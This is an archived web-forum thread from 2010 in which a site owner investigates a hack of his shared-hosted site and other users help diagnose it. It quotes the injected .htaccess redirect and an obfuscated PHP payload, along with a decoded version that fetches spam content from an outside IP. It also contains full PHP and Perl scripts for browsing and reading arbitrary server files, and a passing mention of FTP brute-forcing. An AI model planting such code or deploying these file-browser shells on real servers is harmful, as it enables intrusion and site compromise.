Site Jacked [Archive] - CodingForums.com

View Full Version : Site Jacked

Phil Jackson

01-11-2010, 07:37 AM

Morning all, i'm trying to figure out how i and who hacked my site and what the code does.

my htaccess was altered with the following code:

AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm

RewriteEngine On

RewriteOptions inherit

RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*new.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]

RewriteRule .* http://you-search.in/in.cgi?4&parameter=ku [R,L]

and this in the index:

<?php eval(gzinflate(base64_decode('dVFda8IwFH0X/A+XEpaGldj6AXNSpg9FXybD1b1MKV2b2GBNStpOxth/X+I+3MOEhOTec8/NuSdoXTM92zHZQAh1oxtVqiPTLkoeo9VTtHrGizh+SNYmSmbzaBnjLZl0O4K7prhStYt+G3iAd0rtSoYJKA3f+F/4LS2UuogeankRK8WraUu6nfduBwBpIxbjib0bJYiHU16rbK8qJl0cjEc0GPs0GND+YIS9G99DzCztBT6BVOYw5VXbGOncA2cexdA rhdyLpickrYrqLleHVMjQAQqtLpnMVM7OhjhfZ7Kc3UfOlpgi56o1UlMr9RLpHxctEWy6F1B/ozdyoermFg6+ZlRIm7DbsUMDHAtRMhdQaQbnmqX5SXzg94eEWDtoaLCTH1Oelao2T3NyilEV/vyU9pxz2wmwrFBQty8GthiqroeW8vEJ'))); ?>

and found this in a log:

Sat Dec 26 13:24:32 2009 0 71.200.60.15 154 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/.htaccess b _ o r activegardenmaintenance.co.uk ftp 0 * c
Sat Dec 26 13:24:44 2009 2 71.200.60.15 691 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/.htaccess b _ i r activegardenmaintenance.co.uk ftp 0 * c
Sat Dec 26 13:24:57 2009 0 71.200.60.15 7664 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/index.html b _ o r activegardenmaintenance.co.uk ftp 0 * c
Sat Dec 26 13:25:12 2009 3 71.200.60.15 1760 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/index.html b _ i r activegardenmaintenance.co.uk ftp 0 * c

A lookup for IP 71.200.60.15 says:

OrgName: Comcast Cable Communications, Inc.
OrgID: CMCS
Address: 1800 Bishops Gate Blvd
City: Mt Laurel
StateProv: NJ
PostalCode: 08054
Country: US

NetRange: 71.192.0.0 - 71.207.255.255
CIDR: 71.192.0.0/12
NetName: ATT-COMCAST
NetHandle: NET-71-192-0-0-1
Parent: NET-71-0-0-0-0
NetType: Direct Allocation
NameServer: DNS101.COMCAST.NET
NameServer: DNS102.COMCAST.NET
NameServer: DNS103.COMCAST.NET
Comment:
RegDate: 2005-07-27
Updated: 2008-10-31

OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272
OrgAbuseEmail:

OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications Inc
OrgTechPhone: +1-856-317-7200
OrgTechEmail:

CustName: Comcast Cable Communications, IP Services
Address: 1800 Bishops Gate Blvd.
City: Mt Laurel
StateProv: NJ
PostalCode: 08054-4628
Country: US
RegDate: 2006-04-26
Updated: 2006-04-26

NetRange: 71.200.0.0 - 71.200.127.255
CIDR: 71.200.0.0/17
NetName: DELMARVA-1
NetHandle: NET-71-200-0-0-1
Parent: NET-71-192-0-0-1
NetType: Reassigned
Comment:
RegDate: 2006-04-26
Updated: 2006-04-26

OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272
OrgAbuseEmail:

OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications Inc
OrgTechPhone: +1-856-317-7200
OrgTechEmail:

120

01-11-2010, 09:20 AM

I would first ask who is hosting the site (shared/self) and if it's running something like Wordpress or similar?

This *may* be of help {i've not read it through}
http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/

Phil Jackson

01-11-2010, 11:30 AM

I have actualy read this but not really gave me much help. It's not using word press or anything like that. It's with heart internet ( shared reseller account ).

I have only the contacts script as input on the site which is not bullet proof but is fairly safe. I cant seem to be able to convert the php code into something that i can understand and i dont know what the edited htaccess would do.

And do not know how they could edit such files with a simple email form.

120

01-11-2010, 12:15 PM

The code unpacks/breaks down to this:

$UserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if(strpos($UserAgent, 'google') or strpos(UserAgent, 'yahoo') or strpos(UserAgent, 'msn') or strpos(UserAgent, 'live'))
{
$r = '';
if($f=@fsockopen('195.190.13.235',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: m0re.in\r\n\r\n"))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
$p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
}

And the interest is the IP: 195.190.13.235, which is in the Ukraine.

I'm guessing you are hosting at: 79.170.44.113. The hint at ftp in your logs in the context of index.html would suggest that index.html became some kind of shell methinks.

If you are sure it's not some kind of weak password or script of yours, perhaps an old install of an exploitable web app is to blame? If it's none of these it could be from a neighbour, but security/ permissions on the server would need to be pretty weak to allow another unprivileged user into your directory, unless you've opened that up to everyone?

Some of your neighbours:
www.fashion156.com
www.elgincity.com
www.northlaine.co.uk
www.pentabus.co.uk
www.dsni.co.uk
www.encorepersonnel.co.uk
www.celtichaven.co.uk
www.base-fashions.co.uk
kirstymaccoll.com
www.sailwave.com
www.newburysound.co.uk
www.svcgroup.co.uk
www.contractflooringjournal.co.uk
www.microwaveservice.co.uk
www.beau-bellemodels.co.uk
www.knotfordnook.co.uk
www.maskreys.co.uk
www.icsheatpumps.co.uk
www.camping-birkelt.lu
www.lakedistrictfishing.net
redseadives.com
www.theperfectracingsystem.co.uk
www.sasmail.net
www.lionelsams.com
www.beverleyfestival.com
luxdesigns.com
www.durolitum.co.uk
tg-woodware.com
www.stumbles.co.uk
www.wyevalleyspa.co.uk
www.ticketbusters.co.uk
www.collinscare.co.uk
www.tenantdepositscheme.co.uk
www.coldfuel.co.uk
www.britishbiogen.co.uk
www.campion-mallorca.co.uk
www.therapeutic-shamanism.co.uk
www.porreda.com
annuitysupermarket.com
montstar.com
www.in-text.co.uk
www.blast-cleaning.co.uk
www.poshfizz.com
www.asians4asians.com
www.cheshire-furniture.co.uk
www.stamfordartisansguild.co.uk
lbug.tv
www.dnatattoo.co.uk
www.casa365.co.uk
www.gsa 00000400 -ltd.co.uk
www.holmbushhouse.co.uk
www.duluxdesignservice.co.uk
www.u-tangle.co.uk
www.denims4u.co.uk
www.ashdenehouse.co.uk
www.free-pinkphone.com
www.mylocalelectrician.co.uk
insightinternet.net
www.staveleyhouse.co.uk
www.dolton.org.uk
www.whitehorse-suffolk.co.uk
www.cameronpres.co.uk
www.wealth.co.uk
athearoadrace.c 00000400 om
www.souschefmanchester.co.uk
www.ruffntumble.co.uk
www.weddingcarshop.com
branstonpavilion.co.uk
www.fitzalanhouse.co. 00000400 uk
www.freebweb.co.uk
cc.bingj.com 00000400
www.mylocalweather.org.uk
www.statelessonline.co.uk
www.extraservices.co.uk
www.dwgraphicdesign.co.uk
www.audaciouscitychurch.com
www.heathfarmhouse.co.uk
www.stephengillplantsales.co.uk
www.keyways.co.uk
www.dream-servers.co.uk
timlewisrecruitment.com
threeleggedmusic.com
www.falklandarms.co.uk
volt-mag.com
www.monitoring-social-media.com
www.dennisbeevers.co.uk
www.j8precision.co.uk
www.cooltattooideas.net
www.acupuncture-warwickshire.co.uk
www.ayrshirecs.org
www.cosydevon.co.uk
www.huntercatapu 00000400 lts.co.uk
www.vanleasingandsales.co.uk
www.ajwsolutions.co.uk
www.parkhoteltenby.com
scdic.org
www.eukconsulting.com
www.max-power.org.uk
www.asitdirect.co.uk
www.rowingmart.com
www.jpd-telecoms.co.uk
www.stagedmoves.com
www.dc-graphicdesigns.co.uk
www.force3hire.co.uk
www.usabcc.co.uk
www.hottubsonhire.co.uk
www.x1sportsinsurance.com
www.liveaudacious.com
www.wanobe.com
www.bodiam-ferry.co.uk
www.bad-credit-and-ccj-mortgages.co.uk
www.winterbourndownbordermorris.co.uk
www.trumpetinnledbury.co.uk
www.tom-allan.co.uk
www.culinariabristol.co.uk
www.eaovc.co.uk
www.ajwphoto.co.uk
saundersandpughe.com
www.animalrescuecharity.org.uk
www.gridlineracing.com
www.freelance-consultant.co.uk
www.brightonnaturalsolutions.co.uk
newlodgearts.com
www.markmaier.co.uk
www.passionateaboutfish.co.uk
www.cppih.org.uk
www.warrenphillipswebdesign.co.uk
www.southstaffssailingclub.co.uk
www.veterinaryexpertwitnesses.co.uk
www.sosbirminghamcouriers.co.uk
www.lasertrader.com
www.selkiestrings.co.uk
www.lyndon 00000400 darkes.co.uk
www.encorecarcleaning.co.uk
www.freeiklan.biz
www.kicfm.com
www.diychaircoverhire.co.uk
www 000001F8 .sunshinehomes.pt
www.danceoffensive.co.uk
www.gsomusic.co.uk
kershawsgardencentre.com
www. 00000400 rightyourlife.co.uk
www.knoydarthouse.co.uk
www.singleconnection.co.uk
www.scottishconservationstudio.co.uk
www.pretty-small-shoes.com
www.iansharpassociates.co.uk
www.walkingwithtigers.com
cheapholidaysabroad.net
www.greenlighthealing.co.uk
www.mobilephonespayasyougo.org
www.wasac.co.uk
www.rowantreetheatrecompany.co.uk
hypnorelate.com
www.roadsidevehicles.co.uk
springgroveclinic.com
areia.com
www.mumbaipoets.com
www.sharedlearning.org.uk
prestigeinteriorswales.co.uk
www.bristolcounselling.org.uk
www.adoptaturtle.org.uk
www.just4yougifts.co.uk
www.sostaxi.co.uk
www.clairetinsley.co.uk
www.dsouza. 00000400 co.uk
whpnewbury.com
www.justgolfgifts.co.uk
www.frenchpropertyconnect.com
www.keithtilley.co.uk
www.designchic.co.uk
www.annuityrates.ltd.uk
www.hydrok.co.uk
www.taxilymington.co.uk
www.redlionatyardleyhastings.co.uk
www.kirstymaccoll.com
www.increasingblogtraffic.com
www.hhsctraining.co.uk
www.casa365.co.u 00000400 k
homesmaidclean.net
www.lewisblackweb.com
www.bridgwatercommunications.co.uk
scotlandsfoodtrail.com
www.destinysoffice.com

120

01-11-2010, 12:37 PM

Just for the record, you can use these simple scripts to sniff around a server and see how far you can get. Just upload and browse to them {don't forget to remove afterwards}

You'd be amazed how lame and insecure some shared hosting is. It's not a few ££ a year for nothing :-)

<?php

echo "<pre>\n";

if (ini_get('safe_mode'))

{

echo "[safe_mode enabled]\n\n";

}

else

{

echo "[safe_mode disabled]\n\n";

}

if (isset($_GET['dir']))

{

ls($_GET['dir']);

}

elseif (isset($_GET['file']))

{

cat($_GET['file']);

}

else

{

ls('/');

}

echo "</pre>\n";

function ls($dir)

{

$handle = dir($dir);

while ($filename = $handle->read())

{

$size = filesize("$dir$filename");

if (is_dir("$dir$filename"))

{

if (is_readable("$dir$filename"))

{

$line = str_pad($size, 15);

$line .= "<a href=\"{$_SERVER['PHP_SE LF']}?dir=$dir$filename/\">$filename/</a>";

}

else

{

$line = str_pad($size, 15);

$line .= "$filename/";

}

}

else

{

if (is_readable("$dir$filename"))

{

$line = str_pad($size, 15);

$line .= "<a href=\"{$_SERVER['PHP_SELF']}?file=$dir$filename\">$filename</a>";

}

else

{

$line = str_pad($size, 15);

$line .= $filename;

}

}

echo "$line\n";

}

$handle->close();

}

function cat($file)

{

ob_start();

readfile($file);

$contents = ob_get_contents();

ob_clean();

echo htmlentities($contents);

return true;

}

?>

Personally I find this perl one a little better, but it needs to be put into /cgi-bin and chmodded to 755 {or it will kick out 500's}:

#!/usr/bin/perl -w
use strict;
use CGI qw(:standard);
use CGI::Carp qw(fatalsToBrowser);
use File::HomeDir;
use File::Copy;
print header;
my $browsedir = "/";
my $homedir = File::HomeDir->my_home;
#get the querystring path
my $request = $ENV{'QUERY_STRING'};
print <<End_of_Header;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Perl File System Browser</title>
<style type="text/css" media="screen">
body {
background-color: #CCCCCC;
font: 11px verdana,arial;
}
h1 {
color: #ff0000;
font: 18px verdana,arial;
}
</style>
</head>
<body>
<h1>SPFB - Simple Perl File Browser</h1>
<p>user home directory is: $homedir</p>
End_of_Header
if ($request) {
$request =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;
$request =~ s%p=%%g; #strip off the leading p=
$browsedir = $request;
#check if this is a file or a directory
if (-f $request) {
#if this is a zip file download it
print "REQ: $request <br>";
if ($request =~ /(\.zip|\.gz)/g) {
print "looks like a zip file - I will try to copy it to<b>$homedir</b><br>";
$_ = copy($request,$homedir) or die "Copy failed: $!";
print "copied $request to $homedir<br>" if $_;
print "</body>";
exit();
}
if (-B $request) {
print "This looks like a binary file and may cause the server to **** the bed.<br>I will copy it to your home directory <b>$homedir</b> so you can download it.<br>";
$_ = copy($request,$homedir) or die "Copy failed: $!";
print "copied $request to $homedir<br>" if $_;
print "</body>";
exit();
} else {
print "This is a file, I will attempt to open it<br>";
open (FILE, $request);
while (<FILE>) {
chomp;
print $_ . "<br>";
}
close (FILE);
print "</body>";
exit();
}
}
}

my ($path,$urlpath,$upone,@tmp);
my @files = <$browsedir/*>;
print '<a href="' .$0 . '">.</a><br>';
my $upone;
#calculate the upone value to go to
@tmp = split(/\//, $request);
#drop off the right side of the array if it has at least one element
if (@tmp) {
pop @tmp;
#combine the array into an upone path
$upone = join("/", @tmp);
#urlencode
$upone =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
}

print '<a href="' .$0 . '?p=' . $upone .'">..</a><br>';
#my $strip =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
#print '<a href="' .$0 . '?p=' . $urlpath . '">' . $path . '</a> ';
foreach my $file (@files) {
$path = $file;
$path =~ s%\/{2}%/%g; #strip double slashes
(my $dev, my $ino, my $mode, my $nlink, my $uid, my $gid, my $rdev, my $size, my $atime, my $mtime, my $ctime, my $blksize, my $blocks) = stat $path;
$urlpath = $path;
$urlpath =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
print "F" if -f $file;
print "B" if -B $file;
print "D" if -d $file;
print "T" if -T $file;
print " ";
print "U:$uid G:$gid ";
printf "%03o", $mode&0777;
print " <$size Bytes -" . localtime($ctime) . ">";
print ' <a href="' .$0 . '?p=' . $urlpath . '">' . $path . '</a> ';
print "<br>";

}
print "</body>";

Phil Jackson

01-11-2010, 05:10 PM

wo. thats scary how deep you can get.

Phil Jackson

01-11-2010, 05:16 PM

Can this code be minipulated to find more details about my attacker?

$UserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if(strpos($UserAgent, 'google') or strpos(UserAgent, 'yahoo') or strpos(UserAgent, 'msn') or strpos(UserAgent, 'live'))
{
$r = '';
if($f=@fsockopen('195.190.13.235',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: m0re.in\r\n\r\n"))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
$p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
}

120

01-11-2010, 05:21 PM

I would not be too concerned about who your hacker is - it does not look personal more oportunstic. My concern would be finding the 'how', shutting the door and bolting it.

Looking at some of the shared sites on that server I suspect the breach is local to you. Do you have some kind of broken/unsanitised cms scripts that can be manipulated? Or are you offering some kind of shared hosting where customer A can manipulate the files of customer B?

Phil Jackson

01-11-2010, 05:23 PM

nope, I have only a small email contacts form.

120

01-11-2010, 05:35 PM

Thing is Phil, they got in there somehow - and they will be back if you don't find where they got in.

It can only really come down to weak ftp user/pass {it's pretty trivial to run something like Hydra against an ftp server}

Exploit on the code/scripts

Exploit on a neighbour.

It looks like it's local to you. You've not left any old exploitable junk in a directory that someone could find and use?

Personally I would scan the access and error logs looking for 404's. Particularly for web applications you don't have. Things like this would be bad:
67.228.16.196 - - [31/Oct/2009:07:36:31 +0000] "GET /myAdmin//scripts/setup.php HTTP/1.0" 404 224 "-" "-"
67.228.16.196 - - [31/Oct/2009:07:36:31 +0000] "GET /phpadmin/scripts/setup.php HTTP/1.0" 404 224 "-" "-"
67.228.16.196 - - [31/Oct/2009:07:36:31 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 226 "-" "-"
67.228.16.196 - - [31/Oct/2009:07:36:32 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 226 "-" "-"
67.228.16.196 - - [01/Nov/2009:01:57:32 +0000] "GET /mantisbt/signup_page.php HTTP/1.1" 404 192 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:32 +0000] "GET /tracker/signup_page.php HTTP/1.1" 404 192 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:33 +0000] "GET /bugtracker/signup_page.php HTTP/1.1" 404 194 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:33 +0000] "GET /bugtrack/signup_page.php HTTP/1.1" 404 193 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:33 +0000] "GET /support/signup_page.php HTTP/1.1" 404 191 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:34 +0000] "GET /bug/signup_page.php HTTP/1.1" 404 189 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:34 +0000] "GET /bugs/signup_page.php HTTP/1.1" 404 190 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:34 +0000] "GET /mantis/signup_page.php HTTP/1.1" 404 191 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:34 +0000] "GET /signup_page.php HTTP/1.1" 404 187 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:35 +0000] "GET /php/mantis/signup_page.php HTTP/1.1" 404 193 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:35 +0000] "GET /turbo/mantis/signup_page.php HTTP/1.1" 404 195 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:35 +0000] "GET /blog/register.php HTTP/1.1" 404 186 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:36 +0000] "GET /eblog/register.php HTTP/1.1" 404 186 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:36 +0000] "GET /lightblog/register.php HTTP/1.1" 404 189 "-" "Toata dragostea mea pentru diavola"
67.228.16.196 - - [01/Nov/2009:01:57:36 +0000] "GET /LightBlog/register.php HTTP/1.1" 404 189 "-" "Toata dragostea mea pentru diavola"
173.45.100.106 - - [01/Nov/2009:02:33:29 +0000] "GET /scripts/setup.php HTTP/1.1" 404 186 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:29 +0000] "GET /scripts/setup.php HTTP/1.1" 404 186 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:29 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:30 +0000] "GET /sql/ HTTP/1.1" 404 177 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
173.45.100.106 - - [01/Nov/2009:02:33:30 +0000] "GET /mysql/ HTTP/1.1" 404 179 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

211.232.39.132 - - [04/Nov/2009:06:39:15 +0000] "GET /scripts/setup.php HTTP/1.1" 404 186 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.232.39.132 - - [04/Nov/2009:06:39:15 +0000] "GET /scripts/setup.php HTTP/1.1" 404 186 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.232.39.132 - - [04/Nov/2009:06:39:16 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.232.39.132 - - [04/Nov/2009:06:39:17 +0000] "GET /sql/ HTTP/1.1" 404 177 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.232.39.132 - - [04/Nov/2009:06:39:18 +0000] "GET /mysql/ HTTP/1.1" 404 179 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

oracleguy

01-11-2010, 05:53 PM

Phil Jackson

01-11-2010, 06:48 PM

Its on heartinternet reseller account the passwords are something like 'ZCdl4b19nnP'. my logs only go back so far and that date (26th December) has been cleaned.

120

01-11-2010, 06:52 PM

Without trawling the logs it's pretty much impossible to say where the breach occured and whilst I agree there could be an exploit on the server in general, it does not appear to be affecting other customers on the host. Given the nature of the malicious script, The Newbury Radio Station site on the shared host would have been a much more fruitful tree to climb. For this reason I suspect that it is probably isolated to Phil having some low hanging fruit in there somewhere.

But sure, it *could* be a hole in Apache or any number of services on the box, but I'd personally put that down the list until I ruled all the 'I did this' kind of possibles out.

120

01-11-2010, 06:57 PM

Just one other thing - I appreciate this is *old*:

http://www.theregister.co.uk/2008/06/24/heart_internet_password_gaffe/

but have you been with them long?

oracleguy

01-11-2010, 07:12 PM

dmgroom

02-03-2010, 12:01 PM

just out of interest, which server at heart internet was the site on?

I've just found a similar pice of code on one of my sites hosted at heart internet.

The code was in the index.html file, and according to the file manager this file was last changed at 1:10 on 25 Dec 2009, a date and time I was most certainly not updating web pages.

120

02-04-2010, 11:57 AM

I seem to recall it was: 79.170.44.113